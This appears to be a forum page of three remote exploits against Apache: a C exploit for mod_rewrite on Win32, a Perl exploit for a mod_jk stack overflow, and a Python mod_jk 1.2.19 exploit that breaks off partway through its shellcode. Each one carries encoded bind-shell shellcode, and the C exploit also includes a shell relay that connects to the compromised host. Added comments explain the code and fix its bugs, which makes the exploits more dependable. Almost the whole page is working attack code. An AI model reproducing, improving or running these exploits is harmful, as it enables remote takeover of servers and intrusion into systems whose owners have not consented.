

Apache



#1
$iD

Цель: Apache 2.0.58 mod_rewrite (Win32). Судя по строке get[] ниже, эксплойт рассчитан на конфигурацию, где RewriteRule подставляет часть запрошенного пути в URL вида ldap://… — без такого правила запрос «/ldap://localhost/?A?A?…» до уязвимого кода не дойдёт.
Воздействие: выполнение произвольного кода с правами процесса Apache (первая стадия должна открыть порт 4444, вторая — shell на порту 4445, см. main()).
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <io.h>
#pragma comment( lib, "user32" )
#pragma comment( lib, "ws2_32" )

// Request path appended after the user-supplied rewrite_path (see main()).
// %3f is a URL-encoded '?', so the server sees
// "/ldap://localhost/?A?A?CCCCCCCCCC?C?\x90": an ldap: URL with several
// '?'-separated fields ending in one NOP byte (%90) right before shellcode[].
// This is what exercises the mod_rewrite ldap-URL handling the post targets;
// the exact field layout is the author's and is not explained on the page.
char get[ ] = 
	"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
// First-stage payload, sent inline in the GET request line. The leading bytes
// (\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...) and the all-alphanumeric
// body look like the Metasploit alpha-mixed encoder stub (the Perl post below
// labels an identical prefix "metasploit bindshell"), so this is presumably an
// encoded bind shell: main() expects something to listen on port 4444 after it
// runs. That cannot be verified from this listing without decoding it — treat
// it as an opaque binary from an untrusted source. Because it is passed
// through %s/strlen() it must contain no NUL bytes.
char shellcode[ ]=
	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
	"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
	"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
	"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
	"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
	"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
	"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
	"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
	"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
	"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
	"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
	"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
	"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
	"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
	"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
	"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
	"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
	"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
	"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
	"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
	"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
	"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
	"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
	"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
	"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
	"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
	"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
	"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
	"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
	"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
	"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
	"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
	"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
	"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
	"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
	"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
	"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
	"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
	"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
	"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
// Tail of the request line. Note there is NO space between shellcode[] and
// "HTTP/1.0" in the format string main() uses, so Apache will most likely read
// the whole line as a one-token HTTP/0.9 request and never parse the Host
// header. Kept as in the original: the trigger is the URI itself, not the
// headers (not verified here).
char finish[ ] = 
	"HTTP/1.0\r\nHost: ";
// Second-stage payload, sent raw to port 4444 (see main()). It opens with
// \x31\xc9\x83\xe9 ... \xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13 — the shape of a
// common XOR decoder using the fnstenv GetPC trick — and main() expects a shell
// on port 4445 afterwards. Opaque and unverified; same caveat as shellcode[].
// It is sent with lstrlen(), so it too must be free of NUL bytes.
char payload2[ ] =
	"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18"
	"\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5"
	"\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1"
	"\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3"
	"\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12"
	"\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1"
	"\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1"
	"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
	"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
	"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
	"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
	"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
	"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
	"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
	"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
	"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
	"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
	"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
	"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
	"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
	"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
	"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";


// Interactive socket <-> terminal relay. Ripped from TESO code and modified by ey4s for win32.
// Relay bytes between the local terminal (fd 0/1) and the connected socket
// until either side closes. The int return value is whatever printf() returned
// for the closing message; main() ignores it.
int WINAPI
cmdshell( int sock ) {

	int				l;
	char			buf[ 1000 ];
	struct timeval	time;
	// ul[] is laid out like a one-member Winsock fd_set: {fd_count = 1,
	// fd_array[0] = sock}. That relies on fd_count and SOCKET both being 32-bit,
	// i.e. on a 32-bit build; on Win64 SOCKET is 64-bit and the cast below
	// no longer matches the real fd_set layout.
	unsigned long	ul[ 2 ];

	// Per-call wait on the socket; Winsock select() does not update the
	// timeout, so it is not reset inside the loop.
	time.tv_sec = 1;
	time.tv_usec = 0;

	while ( 1 ) {
		ul[ 0 ] = 1;
		ul[ 1 ] = sock;
		l = select( 0,( fd_set * )&ul,0,0,&time );
		if( l == 1 ) {
			// Socket readable: forward to stdout. write() is the CRT wrapper
			// from <io.h>; a short write is not retried.
			l = recv( sock,buf,sizeof( buf ),0 );
			if ( l <= 0 )		
				return printf("[x] Connection closed.\n");
			l = write( 1,buf,l );
			if ( l<=0 )
				return printf("[x] Connection closed.\n");
		}
		else {
			// Nothing arrived within the timeout (or select failed): block on
			// stdin. Remote output is therefore not shown until the user
			// presses Enter — a known limitation of this polling scheme.
			l = read( 0,buf,sizeof( buf ) );
			if ( l<=0 )
				return printf("[x] Connection closed.\n");
			l = send( sock,buf,l,0 );
			if ( l<=0 )
				return printf("[x] Connection closed.\n");
		}
	}
}

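// Resolve a dotted-quad or host name to an IPv4 address in network byte order.
// Returns INADDR_NONE when the name cannot be resolved or does not map to an
// IPv4 address. Caveat inherited from inet_addr(): it also returns INADDR_NONE
// for the literal "255.255.255.255", so that address cannot be targeted here.
// Must be called after WSAStartup().
DWORD WINAPI
Resolve( char *szHost ) {
	DWORD IP = inet_addr( szHost );
	if ( IP != INADDR_NONE )
		return IP;

	// 'struct' keyword added: the original 'hostent' spelling only compiles as C++.
	struct hostent *sHosten = gethostbyname( szHost );
	// The original dereferenced h_addr_list[0] unconditionally; reject a missing
	// entry, a non-IPv4 family, a wrong address size and an empty list instead.
	if ( sHosten == NULL
	     || sHosten->h_addrtype != AF_INET
	     || sHosten->h_length != (int)sizeof( IP )
	     || sHosten->h_addr_list == NULL
	     || sHosten->h_addr_list[ 0 ] == NULL )
		return INADDR_NONE;
	// memcpy rather than a DWORD* cast: the list entry need not be 4-byte aligned.
	memcpy( &IP, sHosten->h_addr_list[ 0 ], sizeof( IP ) );
	return IP;
} // end of function Resolve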

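// Open a TCP connection to dwHost:dwPort, send the NUL-terminated buffer szSux
// in full, close the socket and pause. Returns 0x1337 on success (the magic the
// caller tests for) and -1 on any failure. Unlike the original, the socket is
// closed on every error path and short send()s are completed.
int WINAPI
sendsux( DWORD dwHost, DWORD dwPort, char* szSux ) {

	SOCKET		sockfd;
	SOCKADDR_IN	their_addr;
	int			total = lstrlen( szSux );   // payload length = C-string length: no NUL bytes allowed
	int			sent  = 0;

	printf( "[+]Connecting...\n" );
	sockfd = socket( AF_INET, SOCK_STREAM, 0 );
	if ( sockfd == INVALID_SOCKET ) {
		printf( "[-]Socket error...\n" );
		return -1;
	}
	memset( &their_addr, 0, sizeof( their_addr ) );
	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons( (u_short)dwPort );
	their_addr.sin_addr.s_addr = dwHost;
	if ( connect( sockfd, (struct sockaddr *)&their_addr, sizeof( their_addr ) ) == SOCKET_ERROR ) {
		printf( "[-]Unable to connect\n" );
		closesocket( sockfd );   // the original leaked the socket here
		return -1;
	}
	printf( "[+]Connected\n[+]Sending...\n" );
	// send() may accept fewer bytes than asked for; loop until everything is out.
	while ( sent < total ) {
		int n = send( sockfd, szSux + sent, total - sent, 0 );
		if ( n == SOCKET_ERROR || n == 0 ) {
			printf( "[-]Unable to send\n" );
			closesocket( sockfd );
			return -1;
		}
		sent += n;
	}
	printf( "[+]Sent\n" );
	closesocket( sockfd );
	// Sleep() takes milliseconds. The original passed 3 — i.e. 3 ms — which is
	// almost certainly a units slip: main() immediately connects to the port
	// the just-sent stage is supposed to open, and the Python exploit further
	// down this page waits 3 seconds at the same point.
	Sleep( 3000 );

	return 0x1337;
}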

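/*
 * Entry point: sploit.exe <hostname> <rewrite_path>
 *
 *  1. builds one request line "GET /" + rewrite_path + get[] + shellcode[] +
 *     finish[] + hostname + "\r\n\r\n" and sends it to port 80 (first stage);
 *  2. sends payload2[] to port 4444, which the first stage is expected to open;
 *  3. connects to port 4445 and relays the terminal to it via cmdshell().
 *
 * Returns 0 after the shell session ends, non-zero on any setup failure.
 *
 * Changes against the original: the request buffer is bounds-checked (the
 * original wsprintf()'d into a 748-byte array with no check, while the fixed
 * parts alone are ~711 bytes, so hostname + rewrite_path longer than ~36
 * characters overflowed the exploit's own stack); the "Try connecting" message
 * names the target (argv[1]) rather than the program (argv[0]); unused locals
 * are gone; WSACleanup() runs on every exit path after WSAStartup().
 */
int
main( int argc, char *argv[ ] ) {

	char		payload[ 1024 ];   /* wsprintf() output is capped at 1024 chars anyway */
	size_t		need;
	DWORD		dwHost;
	WSADATA		wsa;
	SOCKET		sockfd;
	SOCKADDR_IN	their_addr;
	int			rc = 1;

	system( "cls" );   /* cosmetic; fixed command string, no user input involved */
	printf(	" Exploit:\tapache mod rewrite exploit (win32)\n"
			" By:\t\tfabio/b0x (oc-192, old CoTS member)\n"
			" Greetings:\tcaffeine, raver, psikoma, cumatru\n"
			"\t\tinsomnia, teddym6, googleman, ares\n"
			"\t\ttrickster, rebel and Pentaguard\n\n"
			" Rewrited:\t0x48k/el-\n");
	if ( argc != 3 )
		return printf( " Usage:\t\tsploit.exe hostname rewrite_path\n");

	printf( "\n[+]Preparing payload\n" );
	/* "GET /" + path + get + shellcode + finish + host + "\r\n\r\n" + NUL */
	need = 5 + strlen( argv[ 2 ] ) + strlen( get ) + strlen( shellcode )
	     + strlen( finish ) + strlen( argv[ 1 ] ) + 4 + 1;
	if ( need > sizeof( payload ) )
		return printf( "[-]hostname + rewrite_path too long: request would be %u bytes, limit %u\n",
		               (unsigned)( need - 1 ), (unsigned)( sizeof( payload ) - 1 ) );
	wsprintf( payload, "GET /%s%s%s%s%s\r\n\r\n", argv[ 2 ], get, shellcode, finish, argv[ 1 ] );

	if ( WSAStartup( 0x0202, &wsa ) )
		return printf( "[-]WSAStartup error\n" );
	/* Resolve() needs Winsock, hence after WSAStartup(). */
	if ( ( dwHost = Resolve( argv[ 1 ] ) ) == INADDR_NONE ) {
		printf( "[-]Resolve error\n" );
		goto cleanup;
	}
	printf( "[+]Starting first stage...\n" );
	if ( sendsux( dwHost, 80, payload ) != 0x1337 )
		goto cleanup;
	printf( "[+]Starting second stage...\n" );
	if ( sendsux( dwHost, 4444, payload2 ) != 0x1337 )
		goto cleanup;

	printf( "[+] Try connecting to %s:4445 ...\n", argv[ 1 ] );
	sockfd = socket( AF_INET, SOCK_STREAM, 0 );
	if ( sockfd == INVALID_SOCKET ) {
		printf( "[-]Socket error...\n" );
		goto cleanup;
	}
	memset( &their_addr, 0, sizeof( their_addr ) );
	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons( 4445 );
	their_addr.sin_addr.s_addr = dwHost;
	if ( connect( sockfd, (struct sockaddr *)&their_addr, sizeof( their_addr ) ) == SOCKET_ERROR ) {
		printf( "[-]Unable to connect\n" );
		closesocket( sockfd );
		goto cleanup;
	}
	printf( "[+] Connected to shell at %s:4445\n\n", inet_ntoa( their_addr.sin_addr ) );
	cmdshell( (int)sockfd );
	closesocket( sockfd );
	rc = 0;

cleanup:
	WSACleanup( );
	return rc;
}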


#2
aka PSIH

Apache w/ mod_jk Remote Exploit
by eliteboy


# Apache w/ mod_jk Remote Exploit
# by eliteboy

use IO::Socket;

# Banner, argument validation and the fixed target port.
print "***ELiTEBOY*PRESENTZ***APACHE*MOD_JK*REMOTE*EXPLOIT***\n";

# Second argument selects one of the three hard-coded target profiles
# (distro / Apache / mod_jk build combinations the author tested).
$target = $ARGV[1];
my $args_ok = (@ARGV == 2) && ($target >= 1) && ($target <= 3);
unless ($args_ok) {
	print "Usage: modjkx.pl <hostname> <targettype>\n";
	print "1.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.20\n"
		 ."\tDebian 3.1/4.0*Apache 2.2.4/2.2.3&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
	print "2.\tSUSE Enterprise Linux Server SP0/SP3 *** Apache 2.2.4 mod_jk-1.2.19\n"
		 ."\tDebian 3.1 Sarge*Apache 2.2.4&Apache 1.3.37 mod_jk-1.2.20/mod_jk-1.2.19\n";
	print "3.\tFreeBSD5.4-RELEASE *** Apache 2.2.4 mod_jk-1.2.20/mod_jk-1.2.19\n";
	exit;
}

# mod_jk is reached through Apache's ordinary HTTP listener.
$port = 80;

### lnx metasploit bindshell code port 2007
# Encoded x86 Linux payload; the author labels it a Metasploit bind shell on
# port 2007 (the script never connects to it — attach with nc/telnet by hand).
# Opaque blob, not verifiable from this listing: treat it as untrusted binary.
my $lnx_shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x49".
"\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x59\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x69\x79\x37\x41\x6b".
"\x6b\x63\x63\x57\x33\x72\x73\x73\x5a\x76\x62\x32\x4a\x55\x36\x51".
"\x48\x4e\x79\x4e\x69\x38\x61\x6a\x6d\x4f\x70\x7a\x36\x77\x33\x30".
"\x52\x42\x46\x31\x78\x46\x67\x38\x57\x30\x66\x50\x53\x6d\x59\x4b".
"\x51\x32\x4a\x63\x56\x70\x58\x50\x50\x50\x51\x50\x56\x6f\x79\x4b".
"\x51\x7a\x6d\x4f\x70\x48\x30\x65\x36\x4b\x61\x4d\x33\x38\x4d\x4b".
"\x30\x72\x72\x50\x52\x56\x36\x42\x63\x6b\x39\x68\x61\x6e\x50\x33".
"\x56\x68\x4d\x6b\x30\x6d\x43\x70\x6a\x33\x32\x66\x39\x6c\x70\x37".
"\x4f\x58\x4d\x6f\x70\x42\x69\x31\x69\x39\x69\x6e\x50\x74\x4b\x46".
"\x32\x32\x48\x56\x4f\x46\x4f\x64\x33\x62\x48\x35\x38\x56\x4f\x42".
"\x42\x30\x69\x50\x6e\x6b\x39\x4a\x43\x56\x32\x73\x63\x4b\x39\x48".
"\x61\x68\x4d\x6d\x50\x49";

### bsd metasploit bindshell code port 5555
# Encoded x86 FreeBSD payload, labelled a Metasploit bind shell on port 5555.
# The leading run of \x59 (pop ecx) bytes is a slide into the decoder starting
# at \xe8\xa4\xff\xff\xff; the trailing "A" x 100 is plain padding. Opaque blob,
# not verifiable here: treat it as untrusted binary.
my $bsd_shellcode =
"\xeb\x59\x59\x59\x59\xeb\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59".
"\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\xe8\xa4\xff\xff\xff".
"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49".
"\x49\x49\x51\x5a\x6a\x42\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x52".
"\x42\x41\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
"\x75\x59\x79\x53\x5a\x31\x71\x33\x68\x4d\x49\x50\x52\x32\x48\x76".
"\x70\x43\x32\x55\x45\x6f\x43\x6c\x49\x68\x61\x36\x32\x51\x52\x36".
"\x32\x62\x62\x52\x72\x50\x6a\x66\x70\x5a\x6d\x4f\x70\x4f\x69\x6f".
"\x63\x50\x51\x32\x73\x73\x62\x50\x6a\x72\x48\x36\x38\x38\x4d\x4f".
"\x70\x4c\x70\x51\x7a\x68\x4d\x6f\x70\x62\x72\x62\x73\x50\x52\x58".
"\x30\x65\x4e\x5a\x6d\x4d\x50\x6c\x57\x32\x4a\x66\x62\x31\x49\x41".
"\x7a\x41\x4a\x52\x78\x46\x31\x30\x57\x32\x71\x4a\x6d\x4d\x50\x77".
"\x39\x51\x69\x6c\x35\x30\x50\x32\x48\x66\x4f\x56\x4f\x32\x53\x62".
"\x48\x52\x48\x76\x4f\x70\x62\x32\x49\x50\x6e\x4d\x59\x5a\x43\x52".
"\x70\x72\x74\x56\x33\x70\x53\x6e\x50\x47\x4b\x38\x4d\x6b\x30\x42".
"A" x 100;

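# Distance from the start of the request path to the saved return address on
# the targets listed in the usage text (4127 bytes, the author's empirical value).
my $alignment = 4127;

$|=1;

# Per-target shellcode and hard-coded stack address. These addresses only hold
# for the exact distro / Apache / mod_jk builds named above; on any other build
# (or with stack randomisation) the jump lands elsewhere and Apache's child
# merely crashes.
my ($shellcode, $addr);
if ($target == 1) {
	$shellcode = $lnx_shellcode;
	$addr = 0xbffff060;
}
elsif ($target == 2) {
	$shellcode = $lnx_shellcode;
	$addr = 0xbfffef4c;
}
elsif ($target == 3) {
	$shellcode = $bsd_shellcode;
	$addr = 0xbfbfe5d5;
}
else {
	die "unknown target type '$target'\n";
}

# 'V' = unsigned 32-bit little-endian, which is what an x86 return address
# needs regardless of the host running this script; the original's 'l' used
# the host's native byte order and breaks on big-endian machines.
my $offset = pack('V', $addr);

# The original never checked this handle and then printed to undef.
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => $port,
                                 Proto    => 'tcp')
	or die "cannot connect to $ARGV[0]:$port: $@\n";

# Padding is "A" up to the return-address slot; a negative count would silently
# shrink to nothing and shift everything, so refuse an over-long shellcode.
my $pad = $alignment - 4 - length($shellcode);
die "shellcode too long for alignment $alignment\n" if $pad < 0;
my $request = "A" x $pad . $shellcode . $offset;

print $sock "GET /$request HTTP/1.0\r\n\r\n";

# Echo whatever the server answers (normally nothing useful once it crashes).
while(<$sock>) {
	print;
}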

Everything that was made by human is possible to crack => ideal protection does not exist

#3
$iD

Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
Цель: Apache mod_jk 1.2.19
Воздействие: Выполнение произвольного кода
#!/usr/bin/python
#
#   _____ _   _ _____  _____ _____ _____
#  /  ___| |_| |  _  \|  _  |  _  |_   _|
#  | (___|  _  | [_)_/| (_) | (_) | | |
#  \_____|_| |_|_| |_||_____|_____| |_|
#		 C. H. R. O. O. T.  SECURITY  GROUP
#		 - -- ----- --- -- -- ---- --- -- -
#                                             http://www.chroot.org
#
#						  _   _ _ _____ ____ ____ __  _
#		Hacks In Taiwan  | |_| | |_   _|  __|	|  \| |
#		Conference 2008  |  _  | | | | | (__| () |	 |
#						 |_| |_|_| |_| \____|____|_|\__|
#                                             http://www.hitcon.org
#
#
#  Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
#  Author ======:: unohope [at] chroot [dot] org
#
#  IRC =========:: irc.chroot.org #chroot
#
#  ScriptName ==:: Apache Module mod_jk/1.2.19
#
#  Vendor ======:: http://tomcat.apache.org/
#
#  Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
#  Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
#				  Apache/2.0.59 (Win32) mod_jk/1.2.19
#
#  Greets ======:: zha0
#
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#  usage: ./apx-jk_mod-1.2.19 <host>
#
#  [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
#  Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope@chroot.org)
#
#	[+] connecting to 192.168.1.78 ...
#
#  Trying 192.168.1.78...
#  Connected to 192.168.1.78.
#  Escape character is '^]'.
#  Microsoft Windows XP [.. 5.1.2600]
#  © Copyright 1985-2001 Microsoft Corp.
#
#  C:\AppServ\Apache2>
#
#

import os, sys, time
from socket import *

# Encoded payload (same \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49... decoder
# prefix as the Metasploit-labelled blobs in the Perl post above). xpl() runs
# telnet against port 8888 afterwards, so presumably a bind shell on 8888 —
# not verifiable from this listing; treat it as an opaque binary from an
# untrusted source. Python 2 str: one byte per \x escape.
shellcode  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74"
shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e"
